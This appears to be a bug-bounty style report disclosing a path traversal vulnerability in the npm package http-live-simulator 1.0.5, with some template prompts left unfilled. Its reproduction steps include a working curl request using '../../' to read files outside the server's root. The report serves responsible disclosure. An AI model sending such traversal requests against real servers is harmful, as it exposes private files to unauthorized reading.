> NOTE! Thanks for submitting a report! Please replace all the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
I would like to report Path Traversal vulnerability in http-live-simulator
It allows to read arbitrary files from any location on disk
module name: http-live-simulatorversion:1.0.5npm page: https://www.npmjs.com/package/http-live-simulator
> Copy description from npm page
> Replace stats below with numbers from npm’s module page:
[9] weekly downloads
> Description about how the vulnerability was found and how it can be exploited, how it harms package users (data modification/lost, system access, other.
The http-live-simulator module doesn’t set a root directory and allows any arbitrary paths to be accessed on the file system and returned to requesting clients
> Detailed steps to reproduce with all required references/steps/commands. If there is any exploit code or reference to the package source code this is the place where it should be put.
npm install http-live-simulator
node_modules/.bin/http-live --port 8181
curl --path-as-is http://localhost:8181/../../file.txt
> State all technical information about the stack where the vulnerability was found
> Select Y or N for the following statements:
path traversal vulnerability leading to read access in arbitrary files on disk